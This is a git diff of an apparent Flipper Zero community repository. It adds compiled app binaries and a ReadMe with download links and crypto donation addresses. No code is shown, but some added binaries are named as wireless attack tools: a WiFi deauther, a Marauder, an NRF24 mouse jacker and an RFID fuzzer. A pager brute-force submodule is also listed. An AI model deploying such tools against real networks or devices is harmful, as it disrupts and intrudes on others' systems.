diff --git a/.gitmodules b/.gitmodules
index 340e78b7..966db890 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -13,6 +13,9 @@
[submodule "BadUSB/BadUSB-FalsePhilosopher"]
path = BadUSB/BadUSB-FalsePhilosopher
url = https://github.com/FalsePhilosopher/BadUSB-Playground
+[submodule "NFC/NFC-Trolls"]
+ path = NFC/NFC-Trolls
+ url = https://github.com/w0lfzk1n/Flipper-Zero-NFC-Trolls
[submodule "Sub-GHz/Restaurant_Pagers/LRS_Pagers/thanks_jimilinuxguy/lrs-pager-systems-bruteforce"]
path = Sub-GHz/Restaurant_Pagers/LRS_Pagers/thanks_jimilinuxguy/lrs-pager-systems-bruteforce
- url = https://github.com/jimilinuxguy/lrs-pager-systems-bruteforce
+ url = https://github.com/jimilinuxguy/lrs-pager-systems-bruteforce
\ No newline at end of file
diff --git a/Applications/Official/DEV_FW/GPIO/ESP32_WiFi_Marauder.fap b/Applications/Official/DEV_FW/GPIO/ESP32_WiFi_Marauder.fap
new file mode 100644
index 00000000..83625681
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/ESP32_WiFi_Marauder.fap differ
diff --git a/Applications/Official/DEV_FW/GPIO/GPIO_Sentry_Safe.fap b/Applications/Official/DEV_FW/GPIO/GPIO_Sentry_Safe.fap
new file mode 100644
index 00000000..f847a68f
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/GPIO_Sentry_Safe.fap differ
diff --git a/Applications/Official/DEV_FW/GPIO/NRF24_Mouse_Jacker.fap b/Applications/Official/DEV_FW/GPIO/NRF24_Mouse_Jacker.fap
new file mode 100644
index 00000000..fc3415a3
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/NRF24_Mouse_Jacker.fap differ
diff --git a/Applications/Official/DEV_FW/GPIO/NRF24_Sniffer.fap b/Applications/Official/DEV_FW/GPIO/NRF24_Sniffer.fap
new file mode 100644
index 00000000..3414acf0
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/NRF24_Sniffer.fap differ
diff --git a/Applications/Official/DEV_FW/GPIO/gps_nmea.fap b/Applications/Official/DEV_FW/GPIO/gps_nmea.fap
new file mode 100644
index 00000000..356e2d1b
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/gps_nmea.fap differ
diff --git a/Applications/Official/DEV_FW/GPIO/hc_sr04.fap b/Applications/Official/DEV_FW/GPIO/hc_sr04.fap
new file mode 100644
index 00000000..e6645672
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/hc_sr04.fap differ
diff --git a/Applications/Official/DEV_FW/GPIO/i2cTools.fap b/Applications/Official/DEV_FW/GPIO/i2cTools.fap
new file mode 100644
index 00000000..fa6b618d
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/i2cTools.fap differ
diff --git a/Applications/Official/DEV_FW/GPIO/temperature_sensor.fap b/Applications/Official/DEV_FW/GPIO/temperature_sensor.fap
new file mode 100644
index 00000000..05669f09
Binary files /dev/null and b/Applications/Official/DEV_FW/GPIO/temperature_sensor.fap differ
diff --git a/Applications/Official/DEV_FW/Games/2048.fap b/Applications/Official/DEV_FW/Games/2048.fap
new file mode 100644
index 00000000..05f623d6
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/2048.fap differ
diff --git a/Applications/Official/DEV_FW/Games/Arkanoid.fap b/Applications/Official/DEV_FW/Games/Arkanoid.fap
new file mode 100644
index 00000000..b9a449a0
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/Arkanoid.fap differ
diff --git a/Applications/Official/DEV_FW/Games/BlackJack.fap b/Applications/Official/DEV_FW/Games/BlackJack.fap
new file mode 100644
index 00000000..2ff9a97c
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/BlackJack.fap differ
diff --git a/Applications/Official/DEV_FW/Games/Dice.fap b/Applications/Official/DEV_FW/Games/Dice.fap
new file mode 100644
index 00000000..438e1bfa
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/Dice.fap differ
diff --git a/Applications/Official/DEV_FW/Games/FlappyBird.fap b/Applications/Official/DEV_FW/Games/FlappyBird.fap
new file mode 100644
index 00000000..e1d6ba8a
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/FlappyBird.fap differ
diff --git a/Applications/Official/DEV_FW/Games/GameOfLife.fap b/Applications/Official/DEV_FW/Games/GameOfLife.fap
new file mode 100644
index 00000000..52cdb5ac
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/GameOfLife.fap differ
diff --git a/Applications/Official/DEV_FW/Games/MontyHall.fap b/Applications/Official/DEV_FW/Games/MontyHall.fap
new file mode 100644
index 00000000..4bcff553
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/MontyHall.fap differ
diff --git a/Applications/Official/DEV_FW/Games/TAMA_P1.fap b/Applications/Official/DEV_FW/Games/TAMA_P1.fap
new file mode 100644
index 00000000..786db5ae
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/TAMA_P1.fap differ
diff --git a/Applications/Official/DEV_FW/Games/Tanks.fap b/Applications/Official/DEV_FW/Games/Tanks.fap
new file mode 100644
index 00000000..80b2afc7
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/Tanks.fap differ
diff --git a/Applications/Official/DEV_FW/Games/TicTacToe.fap b/Applications/Official/DEV_FW/Games/TicTacToe.fap
new file mode 100644
index 00000000..fc37064d
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/TicTacToe.fap differ
diff --git a/Applications/Official/DEV_FW/Games/VideoPoker.fap b/Applications/Official/DEV_FW/Games/VideoPoker.fap
new file mode 100644
index 00000000..b6d2d1f1
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/VideoPoker.fap differ
diff --git a/Applications/Official/DEV_FW/Games/Zombiez.fap b/Applications/Official/DEV_FW/Games/Zombiez.fap
new file mode 100644
index 00000000..e0cf0b56
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/Zombiez.fap differ
diff --git a/Applications/Official/DEV_FW/Games/game15.fap b/Applications/Official/DEV_FW/Games/game15.fap
new file mode 100644
index 00000000..64fc5b8b
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/game15.fap differ
diff --git a/Applications/Official/DEV_FW/Games/heap_defence.fap b/Applications/Official/DEV_FW/Games/heap_defence.fap
new file mode 100644
index 00000000..93e1ffe9
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/heap_defence.fap differ
diff --git a/Applications/Official/DEV_FW/Games/minesweeper.fap b/Applications/Official/DEV_FW/Games/minesweeper.fap
new file mode 100644
index 00000000..5fb84fa3
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/minesweeper.fap differ
diff --git a/Applications/Official/DEV_FW/Games/scorched_tanks.fap b/Applications/Official/DEV_FW/Games/scorched_tanks.fap
new file mode 100644
index 00000000..8b47ff76
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/scorched_tanks.fap differ
diff --git a/Applications/Official/DEV_FW/Games/snake_game.fap b/Applications/Official/DEV_FW/Games/snake_game.fap
new file mode 100644
index 00000000..fbe20e03
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/snake_game.fap differ
diff --git a/Applications/Official/DEV_FW/Games/tetris_game.fap b/Applications/Official/DEV_FW/Games/tetris_game.fap
new file mode 100644
index 00000000..1070a40c
Binary files /dev/null and b/Applications/Official/DEV_FW/Games/tetris_game.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/BPM_Tapper.fap b/Applications/Official/DEV_FW/Misc/BPM_Tapper.fap
new file mode 100644
index 00000000..b275ea7b
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/BPM_Tapper.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/Barcode_Generator.fap b/Applications/Official/DEV_FW/Misc/Barcode_Generator.fap
new file mode 100644
index 00000000..1085e7da
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/Barcode_Generator.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/MandelbrotSet.fap b/Applications/Official/DEV_FW/Misc/MandelbrotSet.fap
new file mode 100644
index 00000000..eff4efce
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/MandelbrotSet.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/Metronome.fap b/Applications/Official/DEV_FW/Misc/Metronome.fap
new file mode 100644
index 00000000..e84cccc0
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/Metronome.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/Music_Beeper.fap b/Applications/Official/DEV_FW/Misc/Music_Beeper.fap
new file mode 100644
index 00000000..dbb65b12
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/Music_Beeper.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/Paint.fap b/Applications/Official/DEV_FW/Misc/Paint.fap
new file mode 100644
index 00000000..ffab76b5
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/Paint.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/SAM.fap b/Applications/Official/DEV_FW/Misc/SAM.fap
new file mode 100644
index 00000000..9e22b6cb
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/SAM.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/USB_Keyboard.fap b/Applications/Official/DEV_FW/Misc/USB_Keyboard.fap
new file mode 100644
index 00000000..55df5366
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/USB_Keyboard.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/WAV_Player.fap b/Applications/Official/DEV_FW/Misc/WAV_Player.fap
new file mode 100644
index 00000000..e864f632
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/WAV_Player.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/music_player.fap b/Applications/Official/DEV_FW/Misc/music_player.fap
new file mode 100644
index 00000000..31047747
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/music_player.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/ocarina.fap b/Applications/Official/DEV_FW/Misc/ocarina.fap
new file mode 100644
index 00000000..b4ae0c9d
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/ocarina.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/totp.fap b/Applications/Official/DEV_FW/Misc/totp.fap
new file mode 100644
index 00000000..6df33926
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/totp.fap differ
diff --git a/Applications/Official/DEV_FW/Misc/tuning_fork.fap b/Applications/Official/DEV_FW/Misc/tuning_fork.fap
new file mode 100644
index 00000000..96b66b71
Binary files /dev/null and b/Applications/Official/DEV_FW/Misc/tuning_fork.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/Caesar_Cipher.fap b/Applications/Official/DEV_FW/Tools/Caesar_Cipher.fap
new file mode 100644
index 00000000..31579130
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/Caesar_Cipher.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/Calculator.fap b/Applications/Official/DEV_FW/Tools/Calculator.fap
new file mode 100644
index 00000000..d1540d0e
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/Calculator.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/Clock.fap b/Applications/Official/DEV_FW/Tools/Clock.fap
new file mode 100644
index 00000000..fac6eba3
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/Clock.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/ESP8266_IFTTT_Virtual_Button.fap b/Applications/Official/DEV_FW/Tools/ESP8266_IFTTT_Virtual_Button.fap
new file mode 100644
index 00000000..bbbe8a3c
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/ESP8266_IFTTT_Virtual_Button.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/ESP8266_Wifi_Deauther_v2.fap b/Applications/Official/DEV_FW/Tools/ESP8266_Wifi_Deauther_v2.fap
new file mode 100644
index 00000000..3fa8ea2f
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/ESP8266_Wifi_Deauther_v2.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/MouseJiggler.fap b/Applications/Official/DEV_FW/Tools/MouseJiggler.fap
new file mode 100644
index 00000000..81325f2d
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/MouseJiggler.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/Multi_Converter.fap b/Applications/Official/DEV_FW/Tools/Multi_Converter.fap
new file mode 100644
index 00000000..709d741e
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/Multi_Converter.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/Pomodoro_Timer.fap b/Applications/Official/DEV_FW/Tools/Pomodoro_Timer.fap
new file mode 100644
index 00000000..28047bad
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/Pomodoro_Timer.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/RFID_Fuzzer.fap b/Applications/Official/DEV_FW/Tools/RFID_Fuzzer.fap
new file mode 100644
index 00000000..fb256485
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/RFID_Fuzzer.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/bt_hid.fap b/Applications/Official/DEV_FW/Tools/bt_hid.fap
new file mode 100644
index 00000000..95e1abc4
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/bt_hid.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/dap_link.fap b/Applications/Official/DEV_FW/Tools/dap_link.fap
new file mode 100644
index 00000000..9555c22b
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/dap_link.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/dtmf_dolphin.fap b/Applications/Official/DEV_FW/Tools/dtmf_dolphin.fap
new file mode 100644
index 00000000..8a930b4c
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/dtmf_dolphin.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/picopass.fap b/Applications/Official/DEV_FW/Tools/picopass.fap
new file mode 100644
index 00000000..158df955
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/picopass.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/signal_generator.fap b/Applications/Official/DEV_FW/Tools/signal_generator.fap
new file mode 100644
index 00000000..06d66c62
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/signal_generator.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/spectrum_analyzer.fap b/Applications/Official/DEV_FW/Tools/spectrum_analyzer.fap
new file mode 100644
index 00000000..fc1aa3df
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/spectrum_analyzer.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/spi_mem_manager.fap b/Applications/Official/DEV_FW/Tools/spi_mem_manager.fap
new file mode 100644
index 00000000..3ad27c1b
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/spi_mem_manager.fap differ
diff --git a/Applications/Official/DEV_FW/Tools/weather_station.fap b/Applications/Official/DEV_FW/Tools/weather_station.fap
new file mode 100644
index 00000000..c7112a31
Binary files /dev/null and b/Applications/Official/DEV_FW/Tools/weather_station.fap differ
diff --git a/Applications/Official/Games/arkanoid_game.fap b/Applications/Official/Games/arkanoid_game.fap
deleted file mode 100644
index 874266ad..00000000
Binary files a/Applications/Official/Games/arkanoid_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/dice_game.fap b/Applications/Official/Games/dice_game.fap
deleted file mode 100644
index dbb5a921..00000000
Binary files a/Applications/Official/Games/dice_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/flappy_game.fap b/Applications/Official/Games/flappy_game.fap
deleted file mode 100644
index 46a5a71d..00000000
Binary files a/Applications/Official/Games/flappy_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/game_2048.fap b/Applications/Official/Games/game_2048.fap
deleted file mode 100644
index e0b8628e..00000000
Binary files a/Applications/Official/Games/game_2048.fap and /dev/null differ
diff --git a/Applications/Official/Games/game_of_life2.fap b/Applications/Official/Games/game_of_life2.fap
deleted file mode 100644
index 4b2f7067..00000000
Binary files a/Applications/Official/Games/game_of_life2.fap and /dev/null differ
diff --git a/Applications/Official/Games/gameoflife_game.fap b/Applications/Official/Games/gameoflife_game.fap
deleted file mode 100644
index 26af1a24..00000000
Binary files a/Applications/Official/Games/gameoflife_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/raycast_game.fap b/Applications/Official/Games/raycast_game.fap
deleted file mode 100644
index 4afd2f78..00000000
Binary files a/Applications/Official/Games/raycast_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/snake_game.fap b/Applications/Official/Games/snake_game.fap
deleted file mode 100644
index 68cfcc25..00000000
Binary files a/Applications/Official/Games/snake_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/tanks_game.fap b/Applications/Official/Games/tanks_game.fap
deleted file mode 100644
index a24c1916..00000000
Binary files a/Applications/Official/Games/tanks_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/tetris_game.fap b/Applications/Official/Games/tetris_game.fap
deleted file mode 100644
index 175a1116..00000000
Binary files a/Applications/Official/Games/tetris_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/tictactoe_game.fap b/Applications/Official/Games/tictactoe_game.fap
deleted file mode 100644
index ceae66f4..00000000
Binary files a/Applications/Official/Games/tictactoe_game.fap and /dev/null differ
diff --git a/Applications/Official/Games/videopoker_game.fap b/Applications/Official/Games/videopoker_game.fap
deleted file mode 100644
index d84fd3e6..00000000
Binary files a/Applications/Official/Games/videopoker_game.fap and /dev/null differ
diff --git a/Applications/Official/Misc/mandelbrot.fap b/Applications/Official/Misc/mandelbrot.fap
deleted file mode 100644
index 6cc79340..00000000
Binary files a/Applications/Official/Misc/mandelbrot.fap and /dev/null differ
diff --git a/Applications/Official/Misc/music_player.fap b/Applications/Official/Misc/music_player.fap
deleted file mode 100644
index df094c00..00000000
Binary files a/Applications/Official/Misc/music_player.fap and /dev/null differ
diff --git a/Applications/Official/ReadMe.md b/Applications/Official/ReadMe.md
new file mode 100644
index 00000000..5e0b8c0d
--- /dev/null
+++ b/Applications/Official/ReadMe.md
@@ -0,0 +1,26 @@
+# Flipper Application Files (FAPs) for Official firmware
+
+See the [official documentation](https://github.com/flipperdevices/flipperzero-firmware/blob/dev/documentation/AppsOnSDCard.md) or **download all the files** in a [ZIP here](https://uberguidoz.github.io/DownGit/#/home?url=https://github.com/UberGuidoZ/Flipper/tree/main/Applications/Official)!
+
+## A humble thank you to [Aleksandr Zhytnyk](https://github.com/OperKH) for maintaining the FAPs for Official firmware!
+[Alexei Humeniy](https://github.com/ahumeniy) has also contributed a number of updates and was the first to update.
+
+They have been compiled for the current API version (7.x), but if you run across any not here, please PR them in! (Or tag me in Discord...)
+
+[Links to full application name and authors](https://github.com/UberGuidoZ/Flipper/tree/main/Applications/Unleashed%20(and%20RogueMaster))
+
+-----
+
+I've had so many asking for me to add this.
+![Flipper_Blush](https://user-images.githubusercontent.com/57457139/183561666-4424a3cc-679b-4016-a368-24f7e7ad0a88.jpg) ![Flipper_Love](https://user-images.githubusercontent.com/57457139/183561692-381d37bd-264f-4c88-8877-e58d60d9be6e.jpg)
+
+**BTC**: `3AWgaL3FxquakP15ZVDxr8q8xVTc5Q75dS`
+**BCH**: `17nWCvf2YPMZ3F3H1seX8T149Z9E3BMKXk`
+**ETH**: `0x0f0003fCB0bD9355Ad7B124c30b9F3D860D5E191`
+**LTC**: `M8Ujk52U27bkm1ksiWUyteL8b3rRQVMke2`
+
+So, here it is. All donations of *any* size are humbly appreciated.
+![Flipper_Clap](https://user-images.githubusercontent.com/57457139/183561789-2e853ede-8ef7-41e8-a67c-716225177e5d.jpg) ![Flipper_OMG](https://user-images.githubusercontent.com/57457139/183561787-e21bdc1e-b316-4e67-b327-5129503d0313.jpg)
+
+Donations will be used for hardware (and maybe caffeine) to further testing!
+![UberGuidoZ](https://cdn.discordapp.com/emojis/1000632669622767686.gif)
diff --git a/Applications/Official/STABLE_FW/GPIO/ESP32_WiFi_Marauder.fap b/Applications/Official/STABLE_FW/GPIO/ESP32_WiFi_Marauder.fap
new file mode 100644
index 00000000..83625681
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/ESP32_WiFi_Marauder.fap differ
diff --git a/Applications/Official/STABLE_FW/GPIO/GPIO_Sentry_Safe.fap b/Applications/Official/STABLE_FW/GPIO/GPIO_Sentry_Safe.fap
new file mode 100644
index 00000000..f847a68f
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/GPIO_Sentry_Safe.fap differ
diff --git a/Applications/Official/STABLE_FW/GPIO/NRF24_Mouse_Jacker.fap b/Applications/Official/STABLE_FW/GPIO/NRF24_Mouse_Jacker.fap
new file mode 100644
index 00000000..fc3415a3
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/NRF24_Mouse_Jacker.fap differ
diff --git a/Applications/Official/STABLE_FW/GPIO/NRF24_Sniffer.fap b/Applications/Official/STABLE_FW/GPIO/NRF24_Sniffer.fap
new file mode 100644
index 00000000..3414acf0
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/NRF24_Sniffer.fap differ
diff --git a/Applications/Official/STABLE_FW/GPIO/gps_nmea.fap b/Applications/Official/STABLE_FW/GPIO/gps_nmea.fap
new file mode 100644
index 00000000..356e2d1b
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/gps_nmea.fap differ
diff --git a/Applications/Official/STABLE_FW/GPIO/hc_sr04.fap b/Applications/Official/STABLE_FW/GPIO/hc_sr04.fap
new file mode 100644
index 00000000..e6645672
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/hc_sr04.fap differ
diff --git a/Applications/Official/STABLE_FW/GPIO/i2cTools.fap b/Applications/Official/STABLE_FW/GPIO/i2cTools.fap
new file mode 100644
index 00000000..fa6b618d
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/i2cTools.fap differ
diff --git a/Applications/Official/STABLE_FW/GPIO/temperature_sensor.fap b/Applications/Official/STABLE_FW/GPIO/temperature_sensor.fap
new file mode 100644
index 00000000..05669f09
Binary files /dev/null and b/Applications/Official/STABLE_FW/GPIO/temperature_sensor.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/2048.fap b/Applications/Official/STABLE_FW/Games/2048.fap
new file mode 100644
index 00000000..05f623d6
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/2048.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/Arkanoid.fap b/Applications/Official/STABLE_FW/Games/Arkanoid.fap
new file mode 100644
index 00000000..b9a449a0
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/Arkanoid.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/BlackJack.fap b/Applications/Official/STABLE_FW/Games/BlackJack.fap
new file mode 100644
index 00000000..2ff9a97c
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/BlackJack.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/Dice.fap b/Applications/Official/STABLE_FW/Games/Dice.fap
new file mode 100644
index 00000000..438e1bfa
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/Dice.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/FlappyBird.fap b/Applications/Official/STABLE_FW/Games/FlappyBird.fap
new file mode 100644
index 00000000..e1d6ba8a
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/FlappyBird.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/GameOfLife.fap b/Applications/Official/STABLE_FW/Games/GameOfLife.fap
new file mode 100644
index 00000000..52cdb5ac
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/GameOfLife.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/MontyHall.fap b/Applications/Official/STABLE_FW/Games/MontyHall.fap
new file mode 100644
index 00000000..4bcff553
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/MontyHall.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/TAMA_P1.fap b/Applications/Official/STABLE_FW/Games/TAMA_P1.fap
new file mode 100644
index 00000000..786db5ae
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/TAMA_P1.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/Tanks.fap b/Applications/Official/STABLE_FW/Games/Tanks.fap
new file mode 100644
index 00000000..80b2afc7
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/Tanks.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/TicTacToe.fap b/Applications/Official/STABLE_FW/Games/TicTacToe.fap
new file mode 100644
index 00000000..fc37064d
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/TicTacToe.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/VideoPoker.fap b/Applications/Official/STABLE_FW/Games/VideoPoker.fap
new file mode 100644
index 00000000..b6d2d1f1
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/VideoPoker.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/Zombiez.fap b/Applications/Official/STABLE_FW/Games/Zombiez.fap
new file mode 100644
index 00000000..e0cf0b56
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/Zombiez.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/game15.fap b/Applications/Official/STABLE_FW/Games/game15.fap
new file mode 100644
index 00000000..64fc5b8b
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/game15.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/heap_defence.fap b/Applications/Official/STABLE_FW/Games/heap_defence.fap
new file mode 100644
index 00000000..93e1ffe9
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/heap_defence.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/minesweeper.fap b/Applications/Official/STABLE_FW/Games/minesweeper.fap
new file mode 100644
index 00000000..5fb84fa3
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/minesweeper.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/scorched_tanks.fap b/Applications/Official/STABLE_FW/Games/scorched_tanks.fap
new file mode 100644
index 00000000..8b47ff76
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/scorched_tanks.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/snake_game.fap b/Applications/Official/STABLE_FW/Games/snake_game.fap
new file mode 100644
index 00000000..fbe20e03
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/snake_game.fap differ
diff --git a/Applications/Official/STABLE_FW/Games/tetris_game.fap b/Applications/Official/STABLE_FW/Games/tetris_game.fap
new file mode 100644
index 00000000..1070a40c
Binary files /dev/null and b/Applications/Official/STABLE_FW/Games/tetris_game.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/BPM_Tapper.fap b/Applications/Official/STABLE_FW/Misc/BPM_Tapper.fap
new file mode 100644
index 00000000..b275ea7b
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/BPM_Tapper.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/Barcode_Generator.fap b/Applications/Official/STABLE_FW/Misc/Barcode_Generator.fap
new file mode 100644
index 00000000..1085e7da
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/Barcode_Generator.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/MandelbrotSet.fap b/Applications/Official/STABLE_FW/Misc/MandelbrotSet.fap
new file mode 100644
index 00000000..eff4efce
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/MandelbrotSet.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/Metronome.fap b/Applications/Official/STABLE_FW/Misc/Metronome.fap
new file mode 100644
index 00000000..e84cccc0
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/Metronome.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/Music_Beeper.fap b/Applications/Official/STABLE_FW/Misc/Music_Beeper.fap
new file mode 100644
index 00000000..dbb65b12
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/Music_Beeper.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/Paint.fap b/Applications/Official/STABLE_FW/Misc/Paint.fap
new file mode 100644
index 00000000..ffab76b5
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/Paint.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/SAM.fap b/Applications/Official/STABLE_FW/Misc/SAM.fap
new file mode 100644
index 00000000..9e22b6cb
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/SAM.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/USB_Keyboard.fap b/Applications/Official/STABLE_FW/Misc/USB_Keyboard.fap
new file mode 100644
index 00000000..55df5366
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/USB_Keyboard.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/WAV_Player.fap b/Applications/Official/STABLE_FW/Misc/WAV_Player.fap
new file mode 100644
index 00000000..e864f632
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/WAV_Player.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/music_player.fap b/Applications/Official/STABLE_FW/Misc/music_player.fap
new file mode 100644
index 00000000..31047747
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/music_player.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/ocarina.fap b/Applications/Official/STABLE_FW/Misc/ocarina.fap
new file mode 100644
index 00000000..b4ae0c9d
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/ocarina.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/totp.fap b/Applications/Official/STABLE_FW/Misc/totp.fap
new file mode 100644
index 00000000..6df33926
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/totp.fap differ
diff --git a/Applications/Official/STABLE_FW/Misc/tuning_fork.fap b/Applications/Official/STABLE_FW/Misc/tuning_fork.fap
new file mode 100644
index 00000000..96b66b71
Binary files /dev/null and b/Applications/Official/STABLE_FW/Misc/tuning_fork.fap differ
